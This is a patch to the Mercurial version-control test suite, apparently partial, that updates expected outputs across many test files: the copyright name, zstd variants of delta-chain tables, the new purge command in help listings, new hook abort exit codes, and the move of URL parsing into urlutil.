changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + + +Test with --update +================== + +update without conflicts +------------------------ + + $ hg clone main-repo test-repo-update --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +We update for each pull, so the first one gets into a branch independent from the +other and stays there. This is the expected behavior.
+ + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-update ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + 4 files updated, 0 files merged, 0 files removed, 0 files unresolved + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 1 other heads for branch "default" + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 2 other heads for branch "default" + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | @ E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +update with conflicts +--------------------- + + $ hg clone main-repo test-repo-conflict --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +The update has a conflict and interrupts the pull.
+ + $ echo this-will-conflict > test-repo-conflict/D + $ hg add -R test-repo-conflict test-repo-conflict/D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-conflict ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + merging D + warning: conflicts while merging D! (edit, then use 'hg resolve --mark') + 3 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges + [1] + $ hg -R test-repo-conflict resolve -l + U D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ E 4 + | + o D 3 + | + o C 2 + | + o B 1 + | + % A 0 + diff --git a/tests/test-extension.t b/tests/test-extension.t --- a/tests/test-extension.t +++ b/tests/test-extension.t @@ -676,7 +676,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1555,7 +1555,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
@@ -1566,7 +1566,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1580,7 +1580,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1642,7 +1642,7 @@ Mercurial Distributed SCM (version 3.5.2) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
diff --git a/tests/test-fix.t b/tests/test-fix.t --- a/tests/test-fix.t +++ b/tests/test-fix.t @@ -1106,14 +1106,13 @@ $ printf "foo\n" > foo.changed $ hg commit -Aqm "foo" - $ hg debugobsolete `hg parents --template '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets + $ hg ci --amend -m rewritten $ hg --hidden fix -r 0 abort: fixing obsolete revision could cause divergence [255] $ hg --hidden fix -r 0 --config experimental.evolution.allowdivergence=true + 2 new content-divergent changesets $ hg cat -r tip foo.changed FOO diff --git a/tests/test-generaldelta.t b/tests/test-generaldelta.t --- a/tests/test-generaldelta.t +++ b/tests/test-generaldelta.t @@ -106,22 +106,33 @@ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R repo debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 prev 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) 3 2 1 -1 base 104 135 104 0.77037 104 0 0.00000 $ hg -R usegd debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) 
+ 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) $ hg -R full debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 2 0 p1 57 135 164 1.21481 221 57 0.34756 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) Test revlog.optimize-delta-parent-choice @@ -142,9 +153,12 @@ $ hg commit -q -m merge $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) $ hg strip -q -r . 
--config extensions.strip= @@ -154,9 +168,12 @@ $ hg commit -q -m merge --config storage.revlog.optimize-delta-parent-choice=yes $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) Test that strip bundle use bundle2 $ hg --config extensions.strip= strip . @@ -267,12 +284,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 - 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 (no-zstd !) + 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 4 3 50 prev 366 594 629 1.05892 629 0 0.00000 (zstd !) + 52 4 4 51 p1 58 640 687 1.07344 687 0 0.00000 (zstd !) 53 5 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 6 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 
$ hg clone --pull source-repo --config experimental.maxdeltachainspan=2800 relax-chain --config format.generaldelta=yes requesting all changes adding changesets @@ -333,12 +355,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 - 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 (no-zstd !) + 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2789 2050 2.77402 (zstd !) + 52 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 53 6 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 7 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) $ hg clone --pull source-repo --config experimental.maxdeltachainspan=0 noconst-chain --config format.usegeneraldelta=yes --config storage.revlog.reuse-external-delta-parent=no requesting all changes adding changesets @@ -404,4 +431,5 @@ 51 2 13 17 p1 58 594 739 1.24411 2642 1903 2.57510 52 2 14 51 p1 58 640 797 1.24531 2700 1903 2.38770 53 4 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 
diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -1,4 +1,4 @@ -#require pygit2 +#require pygit2 no-windows Setup: $ GIT_AUTHOR_NAME='test'; export GIT_AUTHOR_NAME @@ -14,6 +14,7 @@ > git commit "$@" >/dev/null 2>/dev/null || echo "git commit error" > count=`expr $count + 1` > } + $ git config --global init.defaultBranch master $ hg version -v --config extensions.git= | grep '^[E ]' @@ -28,9 +29,9 @@ $ hg status abort: repository specified git format in .hg/requires but has no .git directory [255] + $ git config --global init.defaultBranch master $ git init Initialized empty Git repository in $TESTTMP/nogit/.git/ - $ git config --global init.defaultBranch master This status invocation shows some hg gunk because we didn't use `hg init --git`, which fixes up .git/info/exclude for us. $ hg status diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -65,6 +65,8 @@ -R with path aliases: +TODO: add rhg support for path aliases +#if no-rhg $ cd c $ hg -R default identify 8580ff50825a tip @@ -75,6 +77,7 @@ $ HOME=`pwd`/../ hg -R relativetohome identify 8580ff50825a tip $ cd .. +#endif #if no-outer-repo @@ -215,6 +218,8 @@ $ hg --cwd c --config paths.quuxfoo=bar paths | grep quuxfoo > /dev/null && echo quuxfoo quuxfoo +TODO: add rhg support for detailed exit codes +#if no-rhg $ hg --cwd c --config '' tip -q abort: malformed --config option: '' (use --config section.name=value) [10] @@ -230,6 +235,7 @@ $ hg --cwd c --config .b= tip -q abort: malformed --config option: '.b=' (use --config section.name=value) [10] +#endif Testing --debug: @@ -264,7 +270,7 @@ Testing --traceback: -#if no-chg +#if no-chg no-rhg $ hg --cwd c --config x --traceback id 2>&1 | grep -i 'traceback' Traceback (most recent call last): Traceback (most recent call last): (py3 !) 
@@ -351,6 +357,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -483,6 +490,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-graft.t b/tests/test-graft.t --- a/tests/test-graft.t +++ b/tests/test-graft.t @@ -223,10 +223,6 @@ committing changelog updating the branch cache grafting 5:97f8bfe72746 "5" - all copies found (* = to merge, ! = divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 6b9e5368ca4e+, remote: 97f8bfe72746 @@ -240,10 +236,6 @@ $ HGEDITOR=cat hg graft 4 3 --log --debug scanning for duplicate grafts grafting 4:9c233e8e184d "4" - all copies found (* = to merge, ! 
= divergent, % = renamed and deleted): - on local side: - src: 'c' -> dst: 'b' - checking for directory renames resolving manifests branchmerge: True, force: True, partial: False ancestor: 4c60f11aa304, local: 1905859650ec+, remote: 9c233e8e184d diff --git a/tests/test-help-hide.t b/tests/test-help-hide.t --- a/tests/test-help-hide.t +++ b/tests/test-help-hide.t @@ -55,6 +55,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -191,6 +192,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -107,6 +107,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -235,6 +236,7 @@ addremove add all new files, delete all missing files files list tracked files forget forget the specified files on the next commit + purge removes files not tracked by Mercurial remove remove the specified files on the next commit rename rename files; equivalent of copy + remove resolve redo merges or set/view the merge status of files @@ -375,8 +377,6 @@ mq manage a stack of patches notify hooks for sending email push notifications 
patchbomb command to send changesets as (a series of) patch emails - purge command to delete untracked files from the working - directory relink recreates hardlinks between repository clones schemes extend schemes with shortcuts to repository swarms share share a common history between several working directories @@ -575,7 +575,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1069,6 +1069,7 @@ debugsetparents manually set the parents of the current working directory (DANGEROUS) + debugshell run an interactive Python interpreter debugsidedata dump the side data for a cl/manifest/file revision debugssl test a secure connection to a server @@ -1832,7 +1833,7 @@ These symbolic names can be used from the command line. To pull from "my_server": 'hg pull my_server'. To push to "local_path": 'hg push - local_path'. + local_path'. You can check 'hg help urls' for details about valid URLs. Options containing colons (":") denote sub-options that can influence behavior for that specific path. Example: @@ -1841,6 +1842,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path + Paths using the 'path://otherpath' scheme will inherit the sub-options + value from the path they point to. 
+ The following sub-options can be defined: "pushurl" @@ -2720,6 +2724,13 @@ set or show the current phase name </td></tr> <tr><td> + <a href="/help/purge"> + purge + </a> + </td><td> + removes files not tracked by Mercurial + </td></tr> + <tr><td> <a href="/help/recover"> recover </a> diff --git a/tests/test-hg-parseurl.py b/tests/test-hg-parseurl.py --- a/tests/test-hg-parseurl.py +++ b/tests/test-hg-parseurl.py @@ -2,44 +2,48 @@ import unittest -from mercurial import hg +from mercurial.utils import urlutil class ParseRequestTests(unittest.TestCase): def testparse(self): self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor'), + urlutil.parseurl(b'http://example.com/no/anchor'), (b'http://example.com/no/anchor', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor#foo'), + urlutil.parseurl(b'http://example.com/an/anchor#foo'), (b'http://example.com/an/anchor', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/no/anchor/branches', [b'foo']), + urlutil.parseurl( + b'http://example.com/no/anchor/branches', [b'foo'] + ), (b'http://example.com/no/anchor/branches', (None, [b'foo'])), ) self.assertEqual( - hg.parseurl(b'http://example.com/an/anchor/branches#bar', [b'foo']), + urlutil.parseurl( + b'http://example.com/an/anchor/branches#bar', [b'foo'] + ), (b'http://example.com/an/anchor/branches', (b'bar', [b'foo'])), ) self.assertEqual( - hg.parseurl( + urlutil.parseurl( b'http://example.com/an/anchor/branches-None#foo', None ), (b'http://example.com/an/anchor/branches-None', (b'foo', [])), ) self.assertEqual( - hg.parseurl(b'http://example.com/'), + urlutil.parseurl(b'http://example.com/'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com'), + urlutil.parseurl(b'http://example.com'), (b'http://example.com/', (None, [])), ) self.assertEqual( - hg.parseurl(b'http://example.com#foo'), + urlutil.parseurl(b'http://example.com#foo'), (b'http://example.com/', (b'foo', [])), ) 
diff --git a/tests/test-hgrc.t b/tests/test-hgrc.t --- a/tests/test-hgrc.t +++ b/tests/test-hgrc.t @@ -59,7 +59,7 @@ #if unix-permissions no-root $ chmod u-r $TESTTMP/included $ hg showconfig section - config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied) + config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied*) (glob) [255] #endif @@ -84,7 +84,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ unset FAKEPATH diff --git a/tests/test-hgweb-auth.py b/tests/test-hgweb-auth.py --- a/tests/test-hgweb-auth.py +++ b/tests/test-hgweb-auth.py @@ -10,7 +10,10 @@ url, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -60,7 +63,7 @@ print('URI:', pycompat.strurl(uri)) try: pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm()) - u, authinfo = util.url(uri).authinfo() + u, authinfo = urlutil.url(uri).authinfo() if authinfo is not None: pm.add_password(*_stringifyauthinfo(authinfo)) print( @@ -198,10 +201,12 @@ def testauthinfo(fullurl, authurl): print('URIs:', fullurl, authurl) pm = urlreq.httppasswordmgrwithdefaultrealm() - ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1]) + ai = _stringifyauthinfo( + urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1] + ) pm.add_password(*ai) print(pm.find_user_password('test', authurl)) -print('\n*** Test urllib2 and util.url\n') +print('\n*** Test urllib2 and urlutil.url\n') testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo') diff --git a/tests/test-hgweb-auth.py.out b/tests/test-hgweb-auth.py.out --- 
a/tests/test-hgweb-auth.py.out +++ b/tests/test-hgweb-auth.py.out @@ -211,7 +211,7 @@ URI: http://example.org/foo abort -*** Test urllib2 and util.url +*** Test urllib2 and urlutil.url URIs: http://user@example.com:8080/foo http://example.com:8080/foo ('user', '') diff --git a/tests/test-hgweb-commands.t b/tests/test-hgweb-commands.t --- a/tests/test-hgweb-commands.t +++ b/tests/test-hgweb-commands.t @@ -2193,7 +2193,8 @@ lookup pushkey stream-preferred - streamreqs=generaldelta,revlogv1,sparserevlog + streamreqs=generaldelta,revlogv1,sparserevlog (no-rust !) + streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog (rust !) unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-hgweb-filelog.t b/tests/test-hgweb-filelog.t --- a/tests/test-hgweb-filelog.t +++ b/tests/test-hgweb-filelog.t @@ -656,7 +656,7 @@ An error occurred while processing your request: </p> <p> - a@6563da9dcf87: not found in manifest + a@6563da9dcf87b1949716e38ff3e3dfaa3198eb06: not found in manifest </p> </div> </div> diff --git a/tests/test-hgweb-json.t b/tests/test-hgweb-json.t --- a/tests/test-hgweb-json.t +++ b/tests/test-hgweb-json.t @@ -2190,6 +2190,10 @@ "topic": "phase" }, { + "summary": "removes files not tracked by Mercurial", + "topic": "purge" + }, + { "summary": "roll back an interrupted transaction", "topic": "recover" }, diff --git a/tests/test-hgweb.t b/tests/test-hgweb.t --- a/tests/test-hgweb.t +++ b/tests/test-hgweb.t @@ -149,7 +149,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] $ get-with-headers.py localhost:$HGPORT 'file/tip/bork' 404 Not Found @@ -202,7 +202,7 @@ An error occurred while processing your request: </p> <p> - bork@2ef0ac749a14: not found in manifest + bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest </p> </div> </div> @@ -218,7 +218,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: 
bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] try bad style diff --git a/tests/test-hgwebdir.t b/tests/test-hgwebdir.t --- a/tests/test-hgwebdir.t +++ b/tests/test-hgwebdir.t @@ -103,7 +103,7 @@ 404 Not Found - error: bork@8580ff50825a: not found in manifest + error: bork@8580ff50825a50c8f716709acdf8de0deddcd6ab: not found in manifest [1] should succeed diff --git a/tests/test-histedit-edit.t b/tests/test-histedit-edit.t --- a/tests/test-histedit-edit.t +++ b/tests/test-histedit-edit.t @@ -375,7 +375,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt f @@ -400,7 +400,7 @@ note: commit message saved in .hg/last-message.txt note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it abort: pretxncommit.unexpectedabort hook exited with status 1 - [255] + [40] $ cat >> .hg/hgrc <<EOF > [hooks] diff --git a/tests/test-histedit-fold.t b/tests/test-histedit-fold.t --- a/tests/test-histedit-fold.t +++ b/tests/test-histedit-fold.t @@ -202,7 +202,7 @@ transaction abort! 
rollback completed abort: pretxncommit.abortfolding hook failed - [255] + [40] $ cat .hg/last-message.txt f diff --git a/tests/test-histedit-non-commute-abort.t b/tests/test-histedit-non-commute-abort.t --- a/tests/test-histedit-non-commute-abort.t +++ b/tests/test-histedit-non-commute-abort.t @@ -84,6 +84,7 @@ ancestor path: e (node 0000000000000000000000000000000000000000) other path: e (node 6b67ccefd5ce6de77e7ead4f5292843a0255329f) extra: ancestorlinknode = 0000000000000000000000000000000000000000 + extra: merged = yes $ hg resolve -l U e diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -227,7 +227,7 @@ HG_PATS=[] abort: pre-identify hook exited with status 1 - [255] + [40] $ hg cat b pre-cat hook: HG_ARGS=cat b HG_HOOKNAME=pre-cat @@ -390,7 +390,7 @@ HG_TAG=fa abort: pretag.forbid hook exited with status 1 - [255] + [40] $ hg tag -l fla pretag hook: HG_HOOKNAME=pretag HG_HOOKTYPE=pretag @@ -405,7 +405,7 @@ HG_TAG=fla abort: pretag.forbid hook exited with status 1 - [255] + [40] pretxncommit hook can see changeset, can roll back txn, changeset no more there after @@ -451,7 +451,7 @@ rollback completed abort: pretxncommit.forbid1 hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -485,7 +485,7 @@ HG_PARENT1=539e4b31b6dc99b3cfbaa6b53cbc1c1f9a1e3a10 abort: precommit.forbid hook exited with status 1 - [255] + [40] $ hg -q tip 4:539e4b31b6dc @@ -644,7 +644,7 @@ HG_URL=file:$TESTTMP/a abort: prepushkey hook exited with status 1 - [255] + [40] $ cd ../a test that prelistkeys can prevent listing keys @@ -679,7 +679,7 @@ HG_NAMESPACE=bookmarks abort: prelistkeys hook exited with status 1 - [255] + [40] $ cd ../a $ rm .hg/hgrc @@ -704,7 +704,7 @@ HG_URL=file:$TESTTMP/a abort: prechangegroup.forbid hook exited with status 1 - [255] + [40] pretxnchangegroup hook can see incoming changes, can roll back txn, incoming changes no longer there after @@ -735,7 +735,7 @@ transaction abort! 
